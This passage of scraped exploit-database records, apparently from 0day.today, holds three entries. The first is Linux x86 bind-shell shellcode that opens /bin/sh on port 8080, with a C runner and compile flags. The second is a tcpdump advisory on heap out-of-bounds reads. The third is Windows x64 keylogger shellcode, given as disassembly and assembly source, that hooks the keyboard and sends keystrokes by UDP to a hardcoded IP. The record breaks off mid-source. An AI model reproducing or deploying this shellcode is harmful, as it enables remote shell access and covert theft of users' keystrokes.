\r\n\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf\\x80\\xff\\xff\\xfe\\x83\\xf7\\xff\\x57\\x66\\x68\\x1f\\x90\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\r\n \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# To compile shellcode from the wrapper script use the following C program \r\n# Replacing the shellcode with the wrapper script shellcode output\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n// Filename: shellcode.c\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf\\x80\\xff\\xff\\xfe\\x83\\xf7\\xff\\x57\\x66\\x68\\x1f\\x90\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\";\r\n \r\nmain()\r\n{\r\n printf(\"Shellcode Length: %d\\n\", strlen(code));\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n}\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# Compile with \r\n \r\ngcc -fno-stack-protector -z execstack -o shellcode shellcode.c\n\n# 0day.today [2019-05-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32652"}, {"lastseen": "2019-03-05T02:18:45", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2019-03-02T00:00:00", "published": "2019-03-02T00:00:00", "id": "1337DAY-ID-32287", "href": "https://0day.today/exploit/description/32287", "title": "tcpdump < 4.9.3 - Multiple Heap-Based Out-of-Bounds Reads Exploit", "type": "zdt", "sourceData": "tcpdump < 4.9.3 - Multiple Heap-Based Out-of-Bounds Reads Exploit\r\n\r\nThrough fuzzing of network capture .pcap files, we have identified 16 crashes with unique stack traces in tcpdump. These crashes are caused by heap-based out-of-bounds memory reads, and can be reproduced with the latest tcpdump source code from GitHub, compiled with AddressSanitizer:\r\n\r\n--- cut ---\r\n$ ./tcpdump --version\r\ntcpdump version 4.10.0-PRE-GIT\r\nlibpcap version 1.10.0-PRE-GIT (with TPACKET_V3)\r\nOpenSSL 1.1.0h 27 Mar 2018\r\nCompiled with AddressSanitizer/CLang.\r\n--- cut ---\r\n\r\nThe command line options we used are as follows:\r\n\r\n--- cut ---\r\n$ ./tcpdump -e -XX -vvv -R $file\r\n--- cut ---\r\n\r\nA summary of each crash with the two top-level callstack items are shown below:\r\n\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n| Id | Top of stack trace |\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n| 0c7293c683364afcf4d60f10fa296429 | #0 0x55fdd6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x55f43c in mfr_print tcpdump/./print-fr.c:498:17 |\r\n| 1092c136071deb2f21ddcde498353dfc | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774b8a in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:411:6 |\r\n| 472984168e31d86fcc3a2cf9b5ac1ddc | #0 0x7c5666 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x7e440e in rx_cache_find tcpdump/./print-rx.c:735:27 |\r\n| 55dca8197d3a7e5900df99c60db2821a | #0 0x73b2cb in rpl_printopts tcpdump/./print-icmp6.c:824:27 |\r\n| | #1 0x73af8b in rpl_daoack_print tcpdump/./print-icmp6.c:952:17 |\r\n| 5966513c685d91c5dc5edb42e5191ed4 | #0 0x7b975b in print_attr_vector64 tcpdump/./print-radius.c:1044:4 |\r\n| | #1 0x7b349e in radius_attrs_print tcpdump/./print-radius.c:1199:18 |\r\n| 5ef0457a44194a7e0fb1f1fa9c2d538c | #0 0x744b26 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x74ff59 in ikev1_n_print tcpdump/./print-isakmp.c:1766:4 |\r\n| 6535c4a7b0942711db1a5570bf428576 | #0 0x729f56 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x72835f in icmp_print tcpdump/./print-icmp.c:573:25 |\r\n| 6d3d893a2bc2d8d50cd9386737f1a3f1 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |\r\n| 7efd0ef3a3602ffba4d429f2beaf8489 | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |\r\n| 8e933ef7fdb3b248cffd2cc432ddfe0e | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |\r\n| 9a16cc309f6e8c57587f6cfc19ad15e0 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |\r\n| ab10aa7f73ff686440d2d40a174bf801 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x651264 in vrrp_print tcpdump/./print-vrrp.c:155:5 |\r\n| b388f74a9f892fb85d750dd0e32efce1 | #0 0x60d676 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x60ad3a in rsvp_obj_print tcpdump/./print-rsvp.c:1581:17 |\r\n| d203c6b47e3cbdf814ad3769589b3628 | #0 0x4bdf60 in __asan_memcpy (tcpdump/tcpdump+0x4bdf60) |\r\n| | #1 0x682088 in ip6addr_string tcpdump/./addrtoname.c:359:2 |\r\n| ec26a95bd915adce3527d4e8152eea84 | #0 0x7ba077 in EXTRACT_BE_U_8 tcpdump/./extract.h:111:20 |\r\n| | #1 0x7b97f5 in print_attr_vector64 tcpdump/./print-radius.c:1046:17 |\r\n| f7fc9a6bc515585b470f8b9c2d2729d7 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x650f19 in vrrp_print tcpdump/./print-vrrp.c:147:5 |\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n\r\nAttached is a ZIP archive containing up to three input samples per each crash, together with the corresponding ASAN logs.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46476.zip\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32287"}, {"lastseen": "2018-10-30T22:40:07", "bulletinFamily": "exploit", "description": "Exploit for win64 platform in category shellcode", "modified": "2018-10-30T00:00:00", "published": "2018-10-30T00:00:00", "id": "1337DAY-ID-31462", "href": "https://0day.today/exploit/description/31462", "title": "Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (Generator) 864 bytes", "type": "zdt", "sourceData": "/*\r\n \r\n # Title : Windows x64 Remote Keylogger (UDP)\r\n # size : 864 bytes\r\n # Author : Roziul Hasan Khan Shifat\r\n # Tested On : Windows 10 x64 pro\r\n # Date : 26-10-2018\r\n # Email: [email\u00a0protected]\r\n \r\n*/\r\n \r\n \r\n \r\n/*\r\n \r\n \r\nkeyl.obj: file format pe-x86-64\r\n \r\n \r\nDisassembly of section .text:\r\n \r\n0000000000000000 <_start>:\r\n 0: eb 1d jmp 1f <p1>\r\n \r\n0000000000000002 <_init_>:\r\n 2: 48 31 d2 xor rdx,rdx\r\n 5: 65 48 8b 42 60 mov rax,QWORD PTR gs:[rdx+0x60]\r\n a: 48 8b 40 18 mov rax,QWORD PTR [rax+0x18]\r\n e: 48 8b 40 20 mov rax,QWORD PTR [rax+0x20]\r\n 12: 48 8b 30 mov rsi,QWORD PTR [rax]\r\n 15: 48 8b 06 mov rax,QWORD PTR [rsi]\r\n 18: 48 8b 70 20 mov rsi,QWORD PTR [rax+0x20]\r\n 1c: 5b pop rbx\r\n 1d: 53 push rbx\r\n 1e: c3 ret \r\n \r\n000000000000001f <p1>:\r\n 1f: e8 de ff ff ff call 2 <_init_>\r\n \r\n0000000000000024 <_p2_>:\r\n 24: 52 push rdx\r\n 25: 52 push rdx\r\n 26: 4c 8d 3c 24 lea r15,[rsp]\r\n 2a: 48 83 ec 38 sub rsp,0x38\r\n 2e: 4c 8d 24 24 lea r12,[rsp]\r\n 32: 48 83 ec 58 sub rsp,0x58\r\n 36: 48 8d 3c 24 lea rdi,[rsp]\r\n 3a: 41 57 push r15\r\n 3c: 41 54 push r12\r\n 3e: 57 push rdi\r\n 3f: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548\r\n 46: 54 49 53 \r\n 49: 50 push rax\r\n 4a: 48 31 c0 xor rax,rax\r\n 4d: 66 b8 cc 01 mov ax,0x1cc\r\n 51: 48 01 c3 add rbx,rax\r\n 54: 53 push rbx\r\n 55: 48 89 f1 mov rcx,rsi\r\n 58: 48 8d 93 6e ff ff ff lea rdx,[rbx-0x92]\r\n 5f: 4d 31 c0 xor r8,r8\r\n 62: 41 b0 02 mov r8b,0x2\r\n 65: 49 89 f9 mov r9,rdi\r\n 68: ff d3 call rbx\r\n 6a: 41 5d pop r13\r\n 6c: 48 31 c0 xor rax,rax\r\n 6f: 50 push rax\r\n 70: 50 push rax\r\n 71: 48 b8 77 73 32 5f 33 movabs rax,0x642e32335f327377\r\n 78: 32 2e 64 \r\n 7b: 48 89 04 24 mov QWORD PTR [rsp],rax\r\n 7f: 66 c7 44 24 08 6c 6c mov WORD PTR [rsp+0x8],0x6c6c\r\n 86: 48 8d 0c 24 lea rcx,[rsp]\r\n 8a: 48 8b 77 08 mov rsi,QWORD PTR [rdi+0x8]\r\n 8e: 48 83 ec 28 sub rsp,0x28\r\n 92: ff d6 call rsi\r\n 94: 48 96 xchg rsi,rax\r\n 96: 48 8d 4c 24 28 lea rcx,[rsp+0x28]\r\n 9b: c7 01 75 73 65 72 mov DWORD PTR [rcx],0x72657375\r\n a1: ff d0 call rax\r\n a3: 48 89 c1 mov rcx,rax\r\n a6: 49 8d 55 8c lea rdx,[r13-0x74]\r\n aa: 4d 31 c0 xor r8,r8\r\n ad: 41 b0 06 mov r8b,0x6\r\n b0: 4c 8d 4f 10 lea r9,[rdi+0x10]\r\n b4: 41 ff d5 call r13\r\n b7: 48 89 f1 mov rcx,rsi\r\n ba: 49 8d 55 e7 lea rdx,[r13-0x19]\r\n be: 4d 31 c0 xor r8,r8\r\n c1: 41 b0 03 mov r8b,0x3\r\n c4: 4c 8d 4f 40 lea r9,[rdi+0x40]\r\n c8: 41 ff d5 call r13\r\n cb: 48 83 c4 38 add rsp,0x38\r\n \r\n00000000000000cf <_p3_>:\r\n cf: 48 31 c9 xor rcx,rcx\r\n d2: 66 b9 98 01 mov cx,0x198\r\n d6: 48 29 cc sub rsp,rcx\r\n d9: 48 83 c1 6a add rcx,0x6a\r\n dd: 48 8d 14 24 lea rdx,[rsp]\r\n e1: 48 8b 5f 40 mov rbx,QWORD PTR [rdi+0x40]\r\n e5: ff d3 call rbx\r\n e7: 48 31 c9 xor rcx,rcx\r\n ea: b1 02 mov cl,0x2\r\n ec: 51 push rcx\r\n ed: 51 push rcx\r\n ee: 5a pop rdx\r\n ef: 41 58 pop r8\r\n f1: 41 b0 11 mov r8b,0x11\r\n f4: 48 8b 5f 48 mov rbx,QWORD PTR [rdi+0x48]\r\n f8: ff d3 call rbx\r\n fa: 48 89 47 08 mov QWORD PTR [rdi+0x8],rax\r\n fe: 48 8b 1f mov rbx,QWORD PTR [rdi]\r\n 101: 48 31 c9 xor rcx,rcx\r\n 104: ff d3 call rbx\r\n 106: 41 c6 07 02 mov BYTE PTR [r15],0x2\r\n 10a: 66 41 c7 47 02 db 83 mov WORD PTR [r15+0x2],0x83db\r\n 111: 41 c7 47 04 c1 a1 c1 mov DWORD PTR [r15+0x4],0x63c1a1c1\r\n 118: 63 \r\n 119: 4d 31 c9 xor r9,r9\r\n 11c: 41 51 push r9\r\n 11e: 41 51 push r9\r\n 120: 59 pop rcx\r\n 121: 5a pop rdx\r\n 122: b1 0d mov cl,0xd\r\n 124: 49 89 c0 mov r8,rax\r\n 127: b2 bc mov dl,0xbc\r\n 129: 4c 01 ea add rdx,r13\r\n 12c: 48 8b 5f 10 mov rbx,QWORD PTR [rdi+0x10]\r\n 130: ff d3 call rbx\r\n \r\n0000000000000132 <_p4_>:\r\n 132: 49 8d 4c 24 08 lea rcx,[r12+0x8]\r\n 137: 48 31 d2 xor rdx,rdx\r\n 13a: 52 push rdx\r\n 13b: 52 push rdx\r\n 13c: 41 58 pop r8\r\n 13e: 41 59 pop r9\r\n 140: 48 8b 5f 28 mov rbx,QWORD PTR [rdi+0x28]\r\n 144: ff d3 call rbx\r\n 146: 49 8d 4c 24 08 lea rcx,[r12+0x8]\r\n 14b: 48 8b 5f 30 mov rbx,QWORD PTR [rdi+0x30]\r\n 14f: ff d3 call rbx\r\n 151: 49 8d 4c 24 08 lea rcx,[r12+0x8]\r\n 156: 48 8b 5f 38 mov rbx,QWORD PTR [rdi+0x38]\r\n 15a: ff d3 call rbx\r\n 15c: eb d4 jmp 132 <_p4_>\r\n \r\n000000000000015e <kernel32_func>:\r\n 15e: 47 rex.RXB\r\n 15f: 65 74 4d gs je 1af <user32_func+0x33>\r\n 162: 6f outs dx,DWORD PTR ds:[rsi]\r\n 163: 64 75 6c fs jne 1d2 <user32_func+0x56>\r\n 166: 65 48 61 gs rex.W (bad) \r\n 169: 6e outs dx,BYTE PTR ds:[rsi]\r\n 16a: 64 6c fs ins BYTE PTR es:[rdi],dx\r\n 16c: 65 41 01 4c 6f 61 add DWORD PTR gs:[r15+rbp*2+0x61],ecx\r\n 172: 64 4c 69 62 72 61 72 imul r12,QWORD PTR fs:[rdx+0x72],0x41797261\r\n 179: 79 41 \r\n 17b: 01 53 65 add DWORD PTR [rbx+0x65],edx\r\n \r\n000000000000017c <user32_func>:\r\n 17c: 53 push rbx\r\n 17d: 65 74 57 gs je 1d7 <ws2_32_func>\r\n 180: 69 6e 64 6f 77 73 48 imul ebp,DWORD PTR [rsi+0x64],0x4873776f\r\n 187: 6f outs dx,DWORD PTR ds:[rsi]\r\n 188: 6f outs dx,DWORD PTR ds:[rsi]\r\n 189: 6b 45 78 41 imul eax,DWORD PTR [rbp+0x78],0x41\r\n 18d: 01 43 61 add DWORD PTR [rbx+0x61],eax\r\n 190: 6c ins BYTE PTR es:[rdi],dx\r\n 191: 6c ins BYTE PTR es:[rdi],dx\r\n 192: 4e rex.WRX\r\n 193: 65 78 74 gs js 20a <get_addr+0x1a>\r\n 196: 48 6f rex.W outs dx,DWORD PTR ds:[rsi]\r\n 198: 6f outs dx,DWORD PTR ds:[rsi]\r\n 199: 6b 45 78 01 imul eax,DWORD PTR [rbp+0x78],0x1\r\n 19d: 47 rex.RXB\r\n 19e: 65 74 4b gs je 1ec <ws2_32_func+0x15>\r\n 1a1: 65 79 53 gs jns 1f7 <get_addr+0x7>\r\n 1a4: 74 61 je 207 <get_addr+0x17>\r\n 1a6: 74 65 je 20d <get_addr+0x1d>\r\n 1a8: 01 47 65 add DWORD PTR [rdi+0x65],eax\r\n 1ab: 74 4d je 1fa <get_addr+0xa>\r\n 1ad: 65 73 73 gs jae 223 <get_addr+0x33>\r\n 1b0: 61 (bad) \r\n 1b1: 67 65 41 01 54 72 61 add DWORD PTR gs:[r10d+esi*2+0x61],edx\r\n 1b8: 6e outs dx,BYTE PTR ds:[rsi]\r\n 1b9: 73 6c jae 227 <get_addr+0x37>\r\n 1bb: 61 (bad) \r\n 1bc: 74 65 je 223 <get_addr+0x33>\r\n 1be: 4d rex.WRB\r\n 1bf: 65 73 73 gs jae 235 <get_addr+0x45>\r\n 1c2: 61 (bad) \r\n 1c3: 67 65 01 44 69 73 add DWORD PTR gs:[ecx+ebp*2+0x73],eax\r\n 1c9: 70 61 jo 22c <get_addr+0x3c>\r\n 1cb: 74 63 je 230 <get_addr+0x40>\r\n 1cd: 68 4d 65 73 73 push 0x7373654d\r\n 1d2: 61 (bad) \r\n 1d3: 67 65 41 01 57 53 add DWORD PTR gs:[r15d+0x53],edx\r\n \r\n00000000000001d7 <ws2_32_func>:\r\n 1d7: 57 push rdi\r\n 1d8: 53 push rbx\r\n 1d9: 41 53 push r11\r\n 1db: 74 61 je 23e <get_addr+0x4e>\r\n 1dd: 72 74 jb 253 <get_addr+0x63>\r\n 1df: 75 70 jne 251 <get_addr+0x61>\r\n 1e1: 01 73 6f add DWORD PTR [rbx+0x6f],esi\r\n 1e4: 63 6b 65 movsxd ebp,DWORD PTR [rbx+0x65]\r\n 1e7: 74 01 je 1ea <ws2_32_func+0x13>\r\n 1e9: 73 65 jae 250 <get_addr+0x60>\r\n 1eb: 6e outs dx,BYTE PTR ds:[rsi]\r\n 1ec: 64 74 6f fs je 25e <get_addr+0x6e>\r\n 1ef: 01 56 57 add DWORD PTR [rsi+0x57],edx\r\n \r\n00000000000001f0 <get_addr>:\r\n 1f0: 56 push rsi\r\n 1f1: 57 push rdi\r\n 1f2: 41 50 push r8\r\n 1f4: 52 push rdx\r\n 1f5: 41 51 push r9\r\n 1f7: 51 push rcx\r\n 1f8: 41 5b pop r11\r\n 1fa: 48 31 db xor rbx,rbx\r\n 1fd: 53 push rbx\r\n 1fe: 53 push rbx\r\n 1ff: 5a pop rdx\r\n 200: 58 pop rax\r\n 201: 8b 59 3c mov ebx,DWORD PTR [rcx+0x3c]\r\n 204: 48 01 cb add rbx,rcx\r\n 207: b2 88 mov dl,0x88\r\n 209: 8b 04 13 mov eax,DWORD PTR [rbx+rdx*1]\r\n 20c: 48 01 c8 add rax,rcx\r\n 20f: 48 31 d2 xor rdx,rdx\r\n 212: 52 push rdx\r\n 213: 52 push rdx\r\n 214: 52 push rdx\r\n 215: 41 58 pop r8\r\n 217: 41 59 pop r9\r\n 219: 41 5a pop r10\r\n 21b: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]\r\n 21f: 4d 01 d8 add r8,r11\r\n 222: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24]\r\n 226: 4d 01 d9 add r9,r11\r\n 229: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c]\r\n 22d: 4d 01 da add r10,r11\r\n 230: 48 31 d2 xor rdx,rdx\r\n 233: 48 31 f6 xor rsi,rsi\r\n 236: 56 push rsi\r\n 237: 59 pop rcx\r\n 238: 41 8b 34 90 mov esi,DWORD PTR [r8+rdx*4]\r\n 23c: 4c 01 de add rsi,r11\r\n 23f: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]\r\n 244: 48 31 c0 xor rax,rax\r\n 247: 8a 04 0f mov al,BYTE PTR [rdi+rcx*1]\r\n 24a: 48 ff c1 inc rcx\r\n 24d: 3c 01 cmp al,0x1\r\n 24f: 75 f6 jne 247 <get_addr+0x57>\r\n 251: 48 ff c2 inc rdx\r\n 254: 51 push rcx\r\n 255: 48 ff c9 dec rcx\r\n 258: 48 87 f7 xchg rdi,rsi\r\n 25b: f3 a6 repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi]\r\n 25d: 59 pop rcx\r\n 25e: 75 d3 jne 233 <get_addr+0x43>\r\n 260: 48 ff ca dec rdx\r\n 263: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]\r\n 268: 48 01 cf add rdi,rcx\r\n 26b: 48 89 7c 24 08 mov QWORD PTR [rsp+0x8],rdi\r\n 270: 48 31 db xor rbx,rbx\r\n 273: 53 push rbx\r\n 274: 58 pop rax\r\n 275: 66 41 8b 1c 51 mov bx,WORD PTR [r9+rdx*2]\r\n 27a: 41 8b 04 9a mov eax,DWORD PTR [r10+rbx*4]\r\n 27e: 4c 01 d8 add rax,r11\r\n 281: 48 8b 1c 24 mov rbx,QWORD PTR [rsp]\r\n 285: 48 89 03 mov QWORD PTR [rbx],rax\r\n 288: 48 83 c3 08 add rbx,0x8\r\n 28c: 48 89 1c 24 mov QWORD PTR [rsp],rbx\r\n 290: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]\r\n 295: 48 ff cb dec rbx\r\n 298: 48 89 5c 24 10 mov QWORD PTR [rsp+0x10],rbx\r\n 29d: 48 31 d2 xor rdx,rdx\r\n 2a0: 48 39 d3 cmp rbx,rdx\r\n 2a3: 75 8e jne 233 <get_addr+0x43>\r\n 2a5: 48 83 c4 18 add rsp,0x18\r\n 2a9: 5f pop rdi\r\n 2aa: 5e pop rsi\r\n 2ab: c3 ret \r\n \r\n00000000000002ac <_proceed_>:\r\n 2ac: 48 83 ec 58 sub rsp,0x58\r\n 2b0: 41 50 push r8\r\n 2b2: 52 push rdx\r\n 2b3: 51 push rcx\r\n 2b4: 48 31 f6 xor rsi,rsi\r\n 2b7: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548\r\n 2be: 54 49 53 \r\n \r\n00000000000002c1 <find>:\r\n 2c1: 4c 8b 14 34 mov r10,QWORD PTR [rsp+rsi*1]\r\n 2c5: 48 ff c6 inc rsi\r\n 2c8: 49 39 c2 cmp r10,rax\r\n 2cb: 75 f4 jne 2c1 <find>\r\n 2cd: 48 83 c6 07 add rsi,0x7\r\n 2d1: 48 8d 1c 34 lea rbx,[rsp+rsi*1]\r\n 2d5: 48 8b 3b mov rdi,QWORD PTR [rbx]\r\n 2d8: 4c 8b 63 08 mov r12,QWORD PTR [rbx+0x8]\r\n 2dc: 4c 8b 7b 10 mov r15,QWORD PTR [rbx+0x10]\r\n 2e0: 48 85 c9 test rcx,rcx\r\n 2e3: 75 68 jne 34d <_out_>\r\n 2e5: 48 31 db xor rbx,rbx\r\n 2e8: b3 01 mov bl,0x1\r\n 2ea: 48 c1 e3 08 shl rbx,0x8\r\n 2ee: 48 39 da cmp rdx,rbx\r\n 2f1: 75 5a jne 34d <_out_>\r\n 2f3: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]\r\n 2f7: 48 31 c9 xor rcx,rcx\r\n 2fa: b1 14 mov cl,0x14\r\n 2fc: ff d3 call rbx\r\n 2fe: 66 41 89 04 24 mov WORD PTR [r12],ax\r\n 303: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]\r\n 307: 48 31 c9 xor rcx,rcx\r\n 30a: b1 10 mov cl,0x10\r\n 30c: ff d3 call rbx\r\n 30e: 66 41 89 44 24 02 mov WORD PTR [r12+0x2],ax\r\n 314: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]\r\n 319: 8b 03 mov eax,DWORD PTR [rbx]\r\n 31b: 41 89 44 24 04 mov DWORD PTR [r12+0x4],eax\r\n 320: 48 83 ec 58 sub rsp,0x58\r\n 324: 48 8b 4f 08 mov rcx,QWORD PTR [rdi+0x8]\r\n 328: 41 54 push r12\r\n 32a: 5a pop rdx\r\n 32b: 4d 31 c9 xor r9,r9\r\n 32e: 41 51 push r9\r\n 330: 41 58 pop r8\r\n 332: 41 b0 10 mov r8b,0x10\r\n 335: 4c 89 7c 24 20 mov QWORD PTR [rsp+0x20],r15\r\n 33a: 4c 89 44 24 28 mov QWORD PTR [rsp+0x28],r8\r\n 33f: 49 83 e8 08 sub r8,0x8\r\n 343: 48 8b 5f 50 mov rbx,QWORD PTR [rdi+0x50]\r\n 347: ff d3 call rbx\r\n 349: 48 83 c4 58 add rsp,0x58\r\n \r\n000000000000034d <_out_>:\r\n 34d: 5a pop rdx\r\n 34e: 41 58 pop r8\r\n 350: 41 59 pop r9\r\n 352: 48 8b 5f 18 mov rbx,QWORD PTR [rdi+0x18]\r\n 356: 48 31 c9 xor rcx,rcx\r\n 359: ff d3 call rbx\r\n 35b: 48 83 c4 58 add rsp,0x58\r\n 35f: c3 ret \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n \r\n/*\r\nsection .text\r\n global _start\r\n_start:\r\n \r\njmp short p1\r\n \r\n_init_:\r\n \r\nxor rdx,rdx\r\nmov rax,[gs:rdx+0x60] ; getting pointer of PEB structure\r\nmov rax,[rax+24] ;rax=PPEB->Ldr\r\nmov rax,[rax+32] ;Ldr->InMemoryOrderModuleList\r\nmov rsi,[rax]\r\nmov rax,[rsi]\r\nmov rsi,[rax+32] ;kernel32.dll base address\r\n \r\npop rbx ;address of _p2_\r\n \r\npush rbx\r\nret; transferring execution control to _p2_\r\n \r\n \r\n \r\np1:\r\ncall _init_\r\n \r\n \r\n \r\n;-----------------------------------------------------------------------------------------------------\r\n \r\n_p2_:\r\n \r\n \r\npush rdx\r\npush rdx\r\nlea r15,[rsp]\r\nsub rsp,56\r\nlea r12,[rsp] ; pointer important data (2 short int + 1 DWORD + 48 byte MSG structure )\r\nsub rsp,88\r\nlea rdi,[rsp] ; pointer to function address\r\n \r\n \r\n \r\npush r15\r\npush r12\r\npush rdi\r\nmov rax,'HEREITIS'\r\npush rax\r\n \r\nxor rax,rax\r\nmov ax,get_addr-_p2_\r\nadd rbx,rax ; address of get_addr\r\n \r\npush rbx ;reserving future use\r\n \r\nmov rcx,rsi\r\n \r\n \r\nlea rdx,[rbx-(get_addr-kernel32_func)]\r\n \r\n \r\nxor r8,r8\r\nmov r8b,2\r\nmov r9,rdi\r\ncall rbx ;loading kernel32_func functions\r\n \r\n \r\n;-------------------------------------------------------------------------------------\r\n \r\npop r13 ;address of get_addr\r\n \r\n;loading ws2_32.dll \r\n \r\nxor rax,rax\r\npush rax\r\npush rax\r\n \r\nmov rax,'ws2_32.d'\r\nmov [rsp],rax\r\nmov [rsp+8],word 'll'\r\nlea rcx,[rsp]\r\nmov rsi,[rdi+8]\r\nsub rsp,40\r\n \r\ncall rsi\r\nxchg rsi,rax\r\n \r\n;----------------------------------------------------------\r\n;loading user32.dll\r\nlea rcx,[rsp+40]\r\nmov [rcx],dword 'user'\r\n \r\ncall rax\r\n \r\n \r\n;====================================\r\n;loading user32.dll functions\r\nmov rcx,rax\r\nlea rdx,[r13-(get_addr-user32_func)]\r\nxor r8,r8\r\nmov r8b,6\r\nlea r9,[rdi+16] ;user32.dll functions from 16\r\ncall r13\r\n \r\n;===================================\r\n;loading ws2_32.dll functions\r\n \r\nmov rcx,rsi\r\nlea rdx,[r13-(get_addr-ws2_32_func)]\r\nxor r8,r8\r\nmov r8b,3\r\nlea r9,[rdi+64] ;ws2_32.dll functions from 64\r\ncall r13\r\n \r\nadd rsp,56\r\n;===========================================All necessary functions are loaded. Time to proceed to main task ========================================\r\n \r\n_p3_:\r\n \r\nxor rcx,rcx\r\nmov cx,408\r\nsub rsp,rcx\r\nadd rcx,106\r\nlea rdx,[rsp]\r\nmov rbx,[rdi+64] ;WSAStartup()\r\n \r\ncall rbx\r\n \r\n \r\nxor rcx,rcx\r\n \r\n \r\n \r\n \r\nmov cl,2\r\npush rcx\r\npush rcx\r\npop rdx\r\npop r8\r\nmov r8b,17\r\nmov rbx,[rdi+72] ;socket()\r\ncall rbx\r\n \r\nmov [rdi+8],rax ;SOCKET\r\n \r\n \r\n \r\n \r\n \r\nmov rbx,[rdi] ; GetModuleHandleA()\r\nxor rcx,rcx\r\ncall rbx\r\n \r\n;------------------------------------\r\n \r\nmov [r15],byte 2\r\nmov [r15+2],word 0x83db ;port change it\r\nmov [r15+4],dword 0x63c1a1c1 ;IP change it\r\n \r\n;-----------------------------------\r\n \r\n \r\n \r\n \r\nxor r9,r9\r\npush r9\r\npush r9\r\npop rcx\r\npop rdx\r\nmov cl,13\r\nmov r8,rax\r\nmov dl,_proceed_-get_addr\r\nadd rdx,r13 \r\nmov rbx,[rdi+16] ;SetWindowsHookExA()\r\n \r\ncall rbx\r\n \r\n \r\n \r\n_p4_:\r\n \r\nlea rcx,[r12+8]\r\nxor rdx,rdx\r\npush rdx\r\npush rdx\r\npop r8\r\npop r9\r\nmov rbx,[rdi+40] ;GetMessageA()\r\n \r\n \r\n \r\ncall rbx\r\n \r\n \r\n \r\n \r\nlea rcx,[r12+8]\r\nmov rbx,[rdi+48] ;TranslateMessage() \r\n \r\ncall rbx\r\n \r\nlea rcx,[r12+8]\r\nmov rbx,[rdi+56] ;DispatchMessageA()\r\n \r\ncall rbx\r\n \r\n \r\njmp short _p4_\r\n \r\n \r\n \r\n;----------------------------------------------------------------------------------------\r\nkernel32_func:\r\ndb 'GetModuleHandleA',1,'LoadLibraryA',1\r\n \r\n \r\nuser32_func:\r\ndb 